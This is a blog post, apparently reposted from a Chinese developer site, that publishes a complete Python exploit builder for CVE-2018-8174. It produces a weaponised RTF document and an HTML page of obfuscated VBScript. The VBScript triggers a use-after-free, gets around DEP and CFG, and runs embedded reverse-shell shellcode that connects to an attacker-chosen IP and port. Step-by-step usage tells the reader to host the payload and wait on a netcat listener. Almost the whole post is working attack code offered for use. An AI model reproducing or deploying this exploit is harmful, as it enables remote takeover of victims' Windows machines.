• CVE-2018-8174 EXP 0day python


    usage: CVE-2018-8174.py [-h] -u URL -o OUTPUT [-i IP] [-p PORT]

    Exploit for CVE-2018-8174

    optional arguments: -h, --help show this help message and exit -u URL, --url URL exp url -o OUTPUT, --output OUTPUT Output exploit rtf -i IP, --ip IP ip for netcat -p PORT, --port PORT port for netcat

    eg:

    1. python CVE-2018-8174.py -u http://1.1.1.1/exploit.html -o exp.rtf -i 2.2.2.2 -p 4444
    2. put exploit.html on your server (1.1.1.1)
    3. netcat listen on [any] 4444 (2.2.2.2)

    enjoy it !

    POC:

      1 import argparse
      2 import struct
      3 
      4 SampleRTF = R"""{
    tf1ansiansicpg1252deff0deflang1033{fonttbl{f0fnilfcharset0 Calibri;}}
      5 {*generator Msftedit 5.41.21.2510;}viewkind4uc1pardsa200sl276slmult1lang9f0fs22{objectobjautlinkobjupdate
    sltpictobjw4321objh4321{*objclass htmlfile}{*objdata 0105000002000000090000004f4c45324c696e6b000000000000000000000a0000
      6 d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000000000000000000000010000000100000000000000001000000200000001000000feffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
      7 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
      8 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
      9 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
     10 fffffffffffffffffdfffffffefffffffefffffffeffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
     11 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
     12 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
     13 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
     14 ffffffffffffffffffffffffffffffff52006f006f007400200045006e00740072007900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000016000500ffffffffffffffff020000000003000000000000c000000000000046000000000000000000000000903b
     15 beae04f2d30103000000000200000000000001004f006c00650000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000a000200ffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000
     16 000000000000000000000000f20000000000000003004f0062006a0049006e0066006f00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000120002010100000003000000ffffffff0000000000000000000000000000000000000000000000000000
     17 0000000000000000000004000000060000000000000003004c0069006e006b0049006e0066006f000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000014000200ffffffffffffffffffffffff000000000000000000000000000000000000000000000000
     18 000000000000000000000000050000008100000000000000010000000200000003000000fefffffffeffffff0600000007000000feffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
     19 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
     20 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
     21 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
     22 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff010000020900000001000000000000002a0000000403000000000000c0000000000000460200000021000c0000005f31353838343937393534000000000080000000e0c9ea79f9bace118c8200aa004ba90b68000000
     23 UNICODE_URL
     24 000000795881f43b1d7f48af2c825dc485276300000000a5ab0000ffffffff20693325f903cf118fd000aa00686f1300000000ffffffff0000
     25 000000000000e05dd6ab04f2d30100000000000000000000000000000000000000000000100203000400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002700
     26 NORMAL_URL
     27 0000bbbbcccc2700
     28 UNICODE_URL
     29 0000000000000000000000000000000000000000000000000000
     30 0000000000000000000000000000000000000000000000000000000000000000000000000000000001050000050000000d0000004d45544146494c45504943540000000000000000005e0000000800000000000000
     31 0100090000032b00000000000500000000000400000003010800050000000b0200000000050000000c0200000000030000001e00050000000d0200000000050000000d0200000000040000002701ffff030000000000}
     32 }par
     33 }
     34 """
     35 
     36 SampleHTML = R"""
     37 <!doctype html>
     38 <html lang="en">
     39 <head>
     40 <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
     41 <meta http-equiv="x-ua-compatible" content="IE=10">
     42 <meta http-equiv="Expires" content="0">
     43 <meta http-equiv="Pragma" content="no-cache">
     44 <meta http-equiv="Cache-control" content="no-cache">
     45 <meta http-equiv="Cache" content="no-cache">
     46 </head>
     47 <body>
     48 <script language="vbscript">
     49 Dim lIIl
     50 Dim IIIlI(6),IllII(6)
     51 Dim IllI
     52 Dim IIllI(40)
     53 Dim lIlIIl,lIIIll
     54 Dim IlII
     55 Dim llll,IIIIl
     56 Dim llllIl,IlIIII
     57 Dim NtContinueAddr,VirtualProtectAddr
     58 IlII=195948557
     59 lIlIIl=Unescape("%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uffff%u7fff%u0000%u0000")
     60 lIIIll=Unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000")
     61 IllI=195890093
     62 Function IIIII(Domain) 
     63     lIlII=0
     64     IllllI=0
     65     IIlIIl=0
     66     Id=CLng(Rnd*1000000)
     67     lIlII=CLng((&h27d+8231-&H225b)*Rnd)Mod (&h137d+443-&H152f)+(&h1c17+131-&H1c99)
     68     If(Id+lIlII)Mod (&h5c0+6421-&H1ed3)=(&h10ba+5264-&H254a) Then
     69         lIlII=lIlII-(&h86d+6447-&H219b)
     70     End If
     71     IllllI=CLng((&h2bd+6137-&H1a6d)*Rnd)Mod (&h769+4593-&H1940)+(&h1a08+2222-&H2255)
     72     IIlIIl=CLng((&h14e6+1728-&H1b5d)*Rnd)Mod (&hfa3+1513-&H1572)+(&h221c+947-&H256e)
     73     IIIII=Domain &"?" &Chr(IllllI) &"=" &Id &"&" &Chr(IIlIIl) &"=" &lIlII
     74 End Function
     75 Function lIIII(ByVal lIlIl)
     76     IIll=""
     77     For index=0 To Len(lIlIl)-1
     78         IIll=IIll &lIlI(Asc(Mid(lIlIl,index+1,1)),2)
     79     Next
     80     IIll=IIll &"00"
     81     If Len(IIll)/(&h15c6+3068-&H21c0) Mod (&h1264+2141-&H1abf)=(&hc93+6054-&H2438) Then
     82         IIll=IIll &"00"
     83     End If
     84     For IIIl=(&h1a1a+3208-&H26a2) To Len(IIll)/(&h1b47+331-&H1c8e)-(&h14b2+4131-&H24d4)
     85         lIIIlI=Mid(IIll,IIIl*(&h576+1268-&Ha66)+(&ha64+6316-&H230f),(&ha49+1388-&Hfb3))
     86         lIlIll=Mid(IIll,IIIl*(&hf82+3732-&H1e12)+(&h210+2720-&Hcaf)+(&h4fa+5370-&H19f2),(&hf82+5508-&H2504))
     87         lIIII=lIIII &"%u" &lIlIll &lIIIlI
     88     Next
     89 End Function
     90 Function lIlI(ByVal Number,ByVal Length)
     91     IIII=Hex(Number)
     92     If Len(IIII)<Length Then
     93         IIII=String(Length-Len(IIII),"0") &IIII    'pad allign with zeros 
     94     Else
     95         IIII=Right(IIII,Length)
     96     End If
     97     lIlI=IIII
     98 End Function
     99 Function GetUint32(lIII)
    100     Dim value
    101     llll.mem(IlII+8)=lIII+4
    102     llll.mem(IlII)=8        'type string
    103     value=llll.P0123456789
    104     llll.mem(IlII)=2
    105     GetUint32=value
    106 End Function
    107 Function IllIIl(lIII)
    108     IllIIl=GetUint32(lIII) And (131071-65536)
    109 End Function
    110 Function lllII(lIII)
    111     lllII=GetUint32(lIII)  And (&h17eb+1312-&H1c0c)
    112 End Function
    113 Sub llllll
    114 End Sub
    115 Function GetMemValue
    116     llll.mem(IlII)=(&h713+3616-&H1530)
    117     GetMemValue=llll.mem(IlII+(&h169c+712-&H195c))
    118 End Function
    119 Sub SetMemValue(ByRef IlIIIl)
    120     llll.mem(IlII+(&h715+3507-&H14c0))=IlIIIl
    121 End Sub
    122 Function LeakVBAddr
    123     On Error Resume Next
    124     Dim lllll
    125     lllll=llllll
    126     lllll=null
    127     SetMemValue lllll
    128     LeakVBAddr=GetMemValue()
    129 End Function
    130 Function GetBaseByDOSmodeSearch(IllIll)
    131     Dim llIl
    132     llIl=IllIll And &hffff0000
    133     Do While GetUint32(llIl+(&h748+4239-&H176f))<>544106784 Or GetUint32(llIl+(&ha2a+7373-&H268b))<>542330692
    134         llIl=llIl-65536
    135     Loop
    136     GetBaseByDOSmodeSearch=llIl
    137 End Function
    138 Function StrCompWrapper(lIII,llIlIl)
    139     Dim lIIlI,IIIl
    140     lIIlI=""
    141     For IIIl=(&ha2a+726-&Hd00) To Len(llIlIl)-(&h2e1+5461-&H1835)
    142         lIIlI=lIIlI &Chr(lllII(lIII+IIIl))
    143     Next
    144     StrCompWrapper=StrComp(UCase(lIIlI),UCase(llIlIl))
    145 End Function
    146 Function GetBaseFromImport(base_address,name_input)
    147     Dim import_rva,nt_header,descriptor,import_dir
    148     Dim IIIIII
    149     nt_header=GetUint32(base_address+(&h3c))
    150     import_rva=GetUint32(base_address+nt_header+&h80)
    151     import_dir=base_address+import_rva
    152     descriptor=0
    153     Do While True
    154         Dim Name
    155         Name=GetUint32(import_dir+descriptor*(&h14)+&hc)
    156         If Name=0 Then
    157             GetBaseFromImport=&hBAAD0000
    158             Exit Function
    159         Else
    160             If StrCompWrapper(base_address+Name,name_input)=0 Then
    161                 Exit Do
    162             End If
    163         End If
    164         descriptor=descriptor+1
    165     Loop
    166     IIIIII=GetUint32(import_dir+descriptor*(&h14)+&h10)
    167     GetBaseFromImport=GetBaseByDOSmodeSearch(GetUint32(base_address+IIIIII))
    168 End Function
    169 Function GetProcAddr(dll_base,name)
    170     Dim p,export_dir,index
    171     Dim function_rvas,function_names,function_ordin
    172     Dim Illlll
    173     p=GetUint32(dll_base+&h3c)
    174     p=GetUint32(dll_base+p+&h78)
    175     export_dir=dll_base+p
    176     function_rvas=dll_base+GetUint32(export_dir+&h1c)
    177     function_names=dll_base+GetUint32(export_dir+&h20)
    178     function_ordin=dll_base+GetUint32(export_dir+&h24)
    179     index=0
    180     Do While True
    181         Dim lllI
    182         lllI=GetUint32(function_names+index*4)
    183         If StrCompWrapper(dll_base+lllI,name)=0 Then
    184             Exit Do
    185         End If
    186         index=index+1
    187     Loop
    188     Illlll=IllIIl(function_ordin+index*2)
    189     p=GetUint32(function_rvas+Illlll*4)
    190     GetProcAddr=dll_base+p
    191 End Function
    192 Function GetShellcode()
    193     IIlI=Unescape("%u0000%u0000%u0000%u0000") &Unescape("REPLACE_SHELLCODE_HERE" &lIIII(IIIII("")))
    194     IIlI=IIlI & String((&h80000-LenB(IIlI))/2,Unescape("%u4141"))
    195     GetShellcode=IIlI
    196 End Function
    197 Function EscapeAddress(ByVal value)
    198     Dim High,Low
    199     High=lIlI((value And &hffff0000)/&h10000,4)
    200     Low=lIlI(value And &hffff,4)
    201     EscapeAddress=Unescape("%u" &Low &"%u" &High)
    202 End Function
    203 Function lIllIl
    204     Dim IIIl,IlllI,IIlI,IlIII,llllI,llIII,lIllI
    205     IlllI=lIlI(NtContinueAddr,8)
    206     IlIII=Mid(IlllI,1,2)
    207     llllI=Mid(IlllI,3,2)
    208     llIII=Mid(IlllI,5,2)
    209     lIllI=Mid(IlllI,7,2)
    210     IIlI=""
    211     IIlI=IIlI &"%u0000%u" &lIllI &"00"
    212     For IIIl=1 To 3
    213         IIlI=IIlI &"%u" &llllI &llIII
    214         IIlI=IIlI &"%u" &lIllI &IlIII
    215     Next
    216     IIlI=IIlI &"%u" &llllI &llIII
    217     IIlI=IIlI &"%u00" &IlIII
    218     lIllIl=Unescape(IIlI)
    219 End Function
    220 Function WrapShellcodeWithNtContinueContext(ShellcodeAddrParam) 'bypass cfg
    221     Dim IIlI
    222     IIlI=String((100334-65536),Unescape("%u4141"))
    223     IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)
    224     IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)
    225     IIlI=IIlI &EscapeAddress(&h3000)
    226     IIlI=IIlI &EscapeAddress(&h40)
    227     IIlI=IIlI &EscapeAddress(ShellcodeAddrParam-8)
    228     IIlI=IIlI &String(6,Unescape("%u4242"))
    229     IIlI=IIlI &lIllIl()
    230     IIlI=IIlI &String((&h80000-LenB(IIlI))/2,Unescape("%u4141"))
    231     WrapShellcodeWithNtContinueContext=IIlI
    232 End Function
    233 Function ExpandWithVirtualProtect(lIlll)
    234     Dim IIlI
    235     Dim lllllI
    236     lllllI=lIlll+&h23
    237     IIlI=""
    238     IIlI=IIlI &EscapeAddress(lllllI)
    239     IIlI=IIlI &String((&hb8-LenB(IIlI))/2,Unescape("%4141"))
    240     IIlI=IIlI &EscapeAddress(VirtualProtectAddr)
    241     IIlI=IIlI &EscapeAddress(&h1b)
    242     IIlI=IIlI &EscapeAddress(0)
    243     IIlI=IIlI &EscapeAddress(lIlll)
    244     IIlI=IIlI &EscapeAddress(&h23)
    245     IIlI=IIlI &String((&400-LenB(IIlI))/2,Unescape("%u4343"))
    246     ExpandWithVirtualProtect=IIlI
    247 End Function
    248 Sub ExecuteShellcode
    249     llll.mem(IlII)=&h4d 'DEP bypass
    250     llll.mem(IlII+8)=0
    251     msgbox(IlII)        'VT replaced
    252 End Sub
    253 Class cla1
    254 Private Sub Class_Terminate()
    255     Set IIIlI(IllI)=lIIl((&h1078+5473-&H25d8))
    256     IllI=IllI+(&h14b5+2725-&H1f59)
    257     lIIl((&h79a+3680-&H15f9))=(&h69c+1650-&Hd0d)
    258 End Sub
    259 End Class
    260 Class cla2
    261 Private Sub Class_Terminate()
    262     Set IllII(IllI)=lIIl((&h15b+3616-&Hf7a))
    263     IllI=IllI+(&h880+542-&Ha9d)
    264     lIIl((&h1f75+342-&H20ca))=(&had3+3461-&H1857)
    265 End Sub
    266 End Class
    267 Class IIIlIl
    268 End Class
    269 Class llIIl
    270 Dim mem
    271 Function P
    272 End Function
    273 Function SetProp(Value)
    274     mem=Value
    275     SetProp=0
    276 End Function
    277 End Class
    278 Class IIIlll
    279 Dim mem
    280 Function P0123456789
    281     P0123456789=LenB(mem(IlII+8))
    282 End Function
    283 Function SPP
    284 End Function
    285 End Class
    286 Class lllIIl
    287 Public Default Property Get P
    288 Dim llII
    289 P=174088534690791e-324
    290 For IIIl=(&h7a0+4407-&H18d7) To (&h2eb+1143-&H75c)
    291     IIIlI(IIIl)=(&h2176+711-&H243d)
    292 Next
    293 Set llII=New IIIlll
    294 llII.mem=lIlIIl
    295 For IIIl=(&h1729+3537-&H24fa) To (&h1df5+605-&H204c)
    296     Set IIIlI(IIIl)=llII
    297 Next
    298 End Property
    299 End Class
    300 Class llllII
    301 Public Default Property Get P
    302 Dim llII
    303 P=636598737289582e-328
    304 For IIIl=(&h1063+2314-&H196d) To (&h4ac+2014-&Hc84)
    305     IllII(IIIl)=(&h442+2598-&He68)
    306 Next
    307 Set llII=New IIIlll
    308 llII.mem=lIIIll
    309 For IIIl=(&h7eb+3652-&H162f) To (&h3e8+1657-&Ha5b)
    310     Set IllII(IIIl)=llII
    311 Next
    312 End Property
    313 End Class
    314 Set llllIl=New lllIIl
    315 Set IlIIII=New llllII
    316 Sub UAF
    317     For IIIl=(&hfe8+3822-&H1ed6) To (&h8b+8633-&H2233)
    318         Set IIllI(IIIl)=New IIIlIl
    319     Next
    320     For IIIl=(&haa1+6236-&H22e9) To (&h1437+3036-&H1fed)
    321         Set IIllI(IIIl)=New llIIl
    322     Next
    323     IllI=0
    324     For IIIl=0 To 6
    325         ReDim lIIl(1)
    326         Set lIIl(1)=New cla1
    327         Erase lIIl
    328     Next
    329     Set llll=New llIIl
    330     IllI=0
    331     For IIIl=0 To 6
    332         ReDim lIIl(1)
    333         Set lIIl(1)=New cla2
    334         Erase lIIl
    335     Next
    336     Set IIIIl=New llIIl
    337 End Sub
    338 Sub InitObjects
    339     llll.SetProp(llllIl)
    340     IIIIl.SetProp(IlIIII)
    341     IlII=IIIIl.mem
    342 End Sub
    343 Sub StartExploit
    344     UAF
    345     InitObjects
    346     vb_adrr=LeakVBAddr()
    347     // Alert "CScriptEntryPointObject Leak: 0x" & Hex(vb_adrr) & vbcrlf & "VirtualTable address: 0x" & Hex(GetUint32(vb_adrr))
    348     vbs_base=GetBaseByDOSmodeSearch(GetUint32(vb_adrr))
    349     // Alert "VBScript Base: 0x" & Hex(vbs_base) 
    350     msv_base=GetBaseFromImport(vbs_base,"msvcrt.dll")
    351     // Alert "MSVCRT Base: 0x" & Hex(msv_base) 
    352     krb_base=GetBaseFromImport(msv_base,"kernelbase.dll")
    353     // Alert "KernelBase Base: 0x" & Hex(krb_base) 
    354     ntd_base=GetBaseFromImport(msv_base,"ntdll.dll")
    355     // Alert "Ntdll Base: 0x" & Hex(ntd_base) 
    356     VirtualProtectAddr=GetProcAddr(krb_base,"VirtualProtect")
    357     // Alert "KernelBase!VirtualProtect Address 0x" & Hex(VirtualProtectAddr) 
    358     NtContinueAddr=GetProcAddr(ntd_base,"NtContinue")
    359     // Alert "KernelBase!VirtualProtect Address 0x" & Hex(NtContinueAddr) 
    360     SetMemValue GetShellcode()
    361     ShellcodeAddr=GetMemValue()+8
    362     // Alert "Shellcode Address 0x" & Hex(ShellcodeAddr) 
    363     SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr)
    364     lIlll=GetMemValue()+69596
    365     SetMemValue ExpandWithVirtualProtect(lIlll)
    366     llIIll=GetMemValue()
    367     // Alert "Executing Shellcode"
    368     ExecuteShellcode
    369 End Sub
    370 StartExploit
    371 </script>
    372 </body>
    373 </html>
    374 """
    375 
    376 reverseip = '1.1.1.1'
    377 reverseport = 4444
    378 
    379 def create_rtf_file(url,filename):
    380     NORMAL_URL = url.encode('hex')+"0"*(78-len(url.encode('hex')))
    381     UNICODE_URL = "00".join("{:02x}".format(ord(c)) for c in url)
    382     if len(UNICODE_URL) < 154:
    383         print 'UNICODE_URL len %d , need to pad ...' % len(UNICODE_URL)
    384         UNICODE_URL = UNICODE_URL+"0"*(154 - len(UNICODE_URL))
    385     res = SampleRTF.replace('NORMAL_URL',NORMAL_URL).replace('UNICODE_URL',UNICODE_URL)
    386     f = open(filename, 'w')
    387     f.write(res)
    388     f.close()
    389     print "Generated "+filename+" successfully"
    390 
    391 
    392 def rev_shellcode(ip,port):
    393     ip = [int(i) for i in ip.split(".")]
    394     buf =  ""
    395     buf += "xfcxe9x8ax00x00x00x5dx83xc5x0bx81xc4x70"
    396     buf += "xfexffxffx8dx54x24x60x52x68xb1x4ax6bxb1"
    397     buf += "xffxd5x8dx44x24x60xebx5cx5ex8dx78x60x57"
    398     buf += "x50x31xdbx53x53x68x04x00x00x08x53x53x53"
    399     buf += "x56x53x68x79xccx3fx86xffxd5x85xc0x74x59"
    400     buf += "x6ax40x80xc7x10x53x53x31xdbx53xffx37x68"
    401     buf += "xaex87x92x3fxffxd5x54x68x44x01x00x00xeb"
    402     buf += "x39x50xffx37x68xc5xd8xbdxe7xffxd5x53x53"
    403     buf += "x53x8bx4cx24xfcx51x53x53xffx37x68xc6xac"
    404     buf += "x9ax79xffxd5xe9x41x01x00x00xe8x9fxffxff"
    405     buf += "xffx72x75x6ex64x6cx6cx33x32x2ex65x78x65"
    406     buf += "x00xe8x71xffxffxffxe8xc2xffxffxffxfcxe8"
    407     buf += "x82x00x00x00x60x89xe5x31xc0x64x8bx50x30"
    408     buf += "x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26"
    409     buf += "x31xffxacx3cx61x7cx02x2cx20xc1xcfx0dx01"
    410     buf += "xc7xe2xf2x52x57x8bx52x10x8bx4ax3cx8bx4c"
    411     buf += "x11x78xe3x48x01xd1x51x8bx59x20x01xd3x8b"
    412     buf += "x49x18xe3x3ax49x8bx34x8bx01xd6x31xffxac"
    413     buf += "xc1xcfx0dx01xc7x38xe0x75xf6x03x7dxf8x3b"
    414     buf += "x7dx24x75xe4x58x8bx58x24x01xd3x66x8bx0c"
    415     buf += "x4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44"
    416     buf += "x24x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5a"
    417     buf += "x8bx12xebx8dx5dx68x33x32x00x00x68x77x73"
    418     buf += "x32x5fx54x68x4cx77x26x07xffxd5xb8x90x01"
    419     buf += "x00x00x29xc4x54x50x68x29x80x6bx00xffxd5"
    420     buf += "x50x50x50x50x40x50x40x50x68xeax0fxdfxe0"
    421     buf += "xffxd5x97x6ax05x68"+struct.pack("!4B",ip[0],ip[1],ip[2],ip[3])+"x68x02x00"
    422     buf += struct.pack("!H",port)+"x89xe6x6ax10x56x57x68x99xa5x74x61"
    423     buf += "xffxd5x85xc0x74x0cxffx4ex08x75xecx68xf0"
    424     buf += "xb5xa2x56xffxd5x68x63x6dx64x00x89xe3x57"
    425     buf += "x57x57x31xf6x6ax12x59x56xe2xfdx66xc7x44"
    426     buf += "x24x3cx01x01x8dx44x24x10xc6x00x44x54x50"
    427     buf += "x56x56x56x46x56x4ex56x56x53x56x68x79xcc"
    428     buf += "x3fx86xffxd5x89xe0x4ex56x46xffx30x68x08"
    429     buf += "x87x1dx60xffxd5xbbxf0xb5xa2x56x68xa6x95"
    430     buf += "xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05"
    431     buf += "xbbx47x13x72x6fx6ax00x53xffxd5"
    432 
    433     return buf.encode("hex")
    434 
    435 def gen_shellcode(s):
    436     n = len(s)
    437     i = 0
    438     strs = ''
    439     if n % 4 == 2:
    440         s=s+'41'
    441     while i <n:
    442         strs += '%u'+s[i+2:i+4]+s[i:i+2]
    443         i+=4
    444     return strs
    445 
    446 if __name__ == '__main__':
    447     parser = argparse.ArgumentParser(description="Exploit for CVE-2018-8174")
    448     parser.add_argument("-u", "--url", help="exp url", required=True)
    449     parser.add_argument('-o', "--output", help="Output exploit rtf", required=True)
    450     parser.add_argument('-i', "--ip", help="ip for netcat", required=False)
    451     parser.add_argument('-p', "--port", help="port for netcat", required=False)
    452     args = parser.parse_args()
    453     url = args.url
    454     filename = args.output
    455     create_rtf_file(url,filename)
    456     if args.ip and args.port:
    457         ip = str(args.ip)
    458         port = int(args.port)
    459         shellcode = gen_shellcode(rev_shellcode(ip,port))
    460     else:
    461         shellcode = gen_shellcode(rev_shellcode(reverseip,reverseport))
    462     res = SampleHTML.replace('REPLACE_SHELLCODE_HERE',shellcode)
    463     f = open('exploit.html', 'w')
    464     f.write(res)
    465     f.close()
    466 
    467     print "!!! Completed !!!"
  • 相关阅读:
    jquery的$().each,$.each的区别
    前端面试题整理
    JS中Null与Undefined的区别
    LESS介绍及其与Sass的差异(转载自伯乐在线,原文链接:http://blog.jobbole.com/24671/)
    APP 弱网测试
    ADB命令
    pytest之参数化parametrize的使用
    APP测试
    python 异常捕捉
    pip 安装依赖 requirements.txt
  • 原文地址:https://www.cnblogs.com/wushangguo/p/9112753.html
Copyright © 2020-2023  润新知